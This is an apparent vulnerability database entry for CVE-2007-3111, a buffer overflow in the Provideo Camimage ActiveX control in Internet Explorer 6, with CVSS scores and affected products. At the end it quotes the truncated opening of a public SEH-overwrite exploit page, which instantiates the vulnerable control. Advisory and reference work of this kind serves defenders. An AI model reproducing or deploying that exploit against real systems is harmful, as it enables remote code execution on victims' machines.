10
CVSSv2

CVE-2007-3111

Published: 07/06/2007 Updated: 23/07/2021
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote malicious users to execute arbitrary code via a long URL property value.

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft internet_explorer 6

provideo camimage_activex_control 1.0.1.5

Exploits

<!-- IE6 / Provideo Camimage class (ISSCamControldll 1015) remote seh overwrite exploit / win2k sp4 tried the SD-222VPRO camera series,you can reach an online demo here: wwwprovideocomtw/security%20live%20demohtm rgod --> <HTML> <object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4' id='Camimage' /></obje ...